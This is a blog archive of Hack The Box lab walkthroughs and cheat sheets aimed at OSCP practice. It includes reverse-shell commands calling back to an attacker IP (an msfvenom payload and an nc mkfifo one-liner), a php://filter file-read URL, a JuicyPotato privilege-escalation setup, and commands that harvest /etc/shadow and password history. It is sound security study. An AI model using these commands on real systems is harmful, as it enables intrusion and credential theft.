Posts

Showing posts from November, 2020

HTB Chatterbox OSCP No Metasploit

Image
Lessons Learned nmap -sT -p- --min-rate 5000 --max-retries 1 10.10.10.74 -Pn (Use this if aggressive scan is slow) Password must be set on root for plink.exe to connect back to Kali (sudo su; passwd root) Must use root account for Ports 1024 and under to connect. Walkthrough First I scan using nmap. My usual nmap -A -p- 10.10.10.74 was on schedule for 3 hours and 30 minutes! I found this nmap option which IS BEAUTIFUL , AMAZING , and a TIME SAVER . If a box takes too long to scan, I will def turn to this. It will become a staple. nmap -sT -p- --min-rate 5000 --max-retries 1 10.10.10.74 -Pn I then do an aggressive scan on both of the ports. AChat is in the header. I searchsploit it. Use msfvenom to generate python shellcode. Remember to include LHOST and LPORT. I changed the -p payload to windows/shell_reverse_tcp msfvenom LHOST=10.10.14.2 LPORT=4444 -a x86 --platform Windows -p windows/shell_reverse_tcp -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x8...

HTB Devel OSCP No Metasploit

Image
Walkthrough I'm writing this because I haven't seen a writeup that used the Potato privilege escalation method. This will be an OSCP No Metasploit allowed writeup. Use this https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx aspx reverse shell. Change the IP and Port in the file. Put the shell.aspx in the FTP directory. Remember to write the command "binary". Its best practice so your file makes it in one piece! Then setup your netcat listener and trigger the shell by visiting http://10.10.10.5/shell.aspx I did a whoami /priv and notice the SEImpersonatePrivilege is Enabled. I run PowerUp and also get a note about it. Looks like will be using a Potato attack! I transfer JuicyPotato86.exe, nc.exe, and go.bat to the Windows box using certutil. FTP will work too. You can get the JuicyPotato x86 compiled exe file here: https://github.com/ivanitlearning/Juicy-Potato-x86/releases . Download the nc.exe x86 here: https://eternallybored.or...

HTB Irked

Image
Lessons Learned Debian doesn't have the command sudo if root password is set. steghide extract -sf irked.jpg (steghide exists). TEST OUT ALL SUIDS THAT DON'T END UP IN DEFAULT. HexChat is an IRC client. Walkthrough I first do an aggressive nmap scan. I find a web server with a few IRC ports open. I connect via netcat on port 6697, 8067, and 65534. I see some activity going on. The other port, 40542 is not responding. From using IRC in the past, I know I need an IRC client. I download HexChat to use. I see that the banner version is displaying when I connect. It says Unreal3.2.8.1. I try out some exploits and find this one works the best: https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor Open up exploit.py and change the lines to your IP Address and port Be careful with the shell. If it gets stuck, you will need to restart the box. A trick of mine is to have the shell open up another shell with OpenBSD Netcat. If I quit the ...

HTB Friendzone

Image
Lessons Learned 1. In the /etc/hosts file, you can put multiple domains on one line like so: BEFORE: AFTER: 2. If you need a reverse shell in a python script, this will work: echo 'system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 5555 >/tmp/f")' >> os.py 3. In PHP Command Injection, try php://filter https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard 4. dig axfr friendzone.red @10.10.10.123 Command to find subdomains 5. Use nmap -p 445 --script=smb-enum-shares 10.10.10.123 to get a better picture 6. pspy32 has been added to my transfer folder and new edition to Priv Esc. I learned a lot of new things from this box! Walkthrough The first thing I do is a nmap agressive scan: nmap -A -p- 10.10.10.123 > nmapResults.txt. I see friendzone.red is a possible domain name and put it in the hosts file along with friendz...

SAMBA Jutsus

Image
Samba Jutsus 1. nmap -p 445 --script=smb-enum-shares 10.10.10.123 This will tell you exact paths. If it says C:\etc\Development and its running on Linux, its really /etc/Development. 2. smbmap -H 10.10.10.123 | smbmap -H 10.10.10.123 -r smbmap shows your access privileges. 3. smbclient -L \\10.10.10.123 | smbclient \\\\10.10.10.123\\Development Good old smbclient. 4. Mounting Try to mount if smbclient isn't working. sudo mkdir /media/SMBShare sudo mount //10.10.10.134/Backups /media/SMBShare/ sudo umount -f /media/SMBShare/ 5. nmap -p 139, 445 -script=smb-vuln-* 10.10.10.123 -Pn This nmap script smb-vuln-* is good for finding MS08-067 and EternalBlue.

Linux Privilege Escalation Jutsus

Image
Introduction This is a list of Linux Privilege Escalation jutsus I am collecting. Most originated from TCM's Linux Priv Esc course. 1. linpeas.sh Link here: linpeas.sh on Github 2. Linux Exploit Suggester Link here: linux-exploit-suggester.py on Github Works like Windows-Exploit-Suggester. It will find Kernel exploits you can potentially use. 2.5 pspy32 You can run ./pspy32 to see what background processes are running. Even for root. Use this if your running out of ideas. 3. Scripts Misc. LinEnum LinuxPrivChecker 3.1 Weak File Permissions cat /etc/shadow Copy /etc/passwd and /etc/shadow. Commands in screenshot. 3.2 History cat ~/.bash_history | grep -i passw history 3.3 Files the User Owns find / -user jimmy -ls 2>/dev/null This could lead to a hint of where to go. 4. Kernel Exploits 4.1 Dirtyc0w CVE-2016-5195 Download from here: c0w.c 4.2 Ubuntu 16.04.4 CVE-2017-16995 https://www.exploit-db.com/exploits/...

Australia National Missing Persons Event

Image
Team at Australia Headquarters. Minister for Home Affairs Peter Dutton. AustCyber virtual environment Hallway. AustCyber virtual environment with robots. Final Event Tally. Introduction I was a judge Wednesday-Thursday from 6pm to 3am (Central Time CT North America) for Australia's National Missing Person CTF event. Event The Australia CTF is my favorite Trace Labs event of the year. It wasn't just the Australian National event, it was THE international event of the year. The event was so well planned. The Minister for Home Affairs Peter Dutton came to talk before we started. Dutton wasn't the only government official either, I believe Tim Watts, Shadow Minister of Cybersecurity was there too. I thought WOW high officials in government showed up IN-PERSON, know what Trace Labs is, and support our mission to help law enforcement find missing persons!?! Also the titles sound pretty cool. "Shadow Minister of Cybersecurity". Sounds like bat...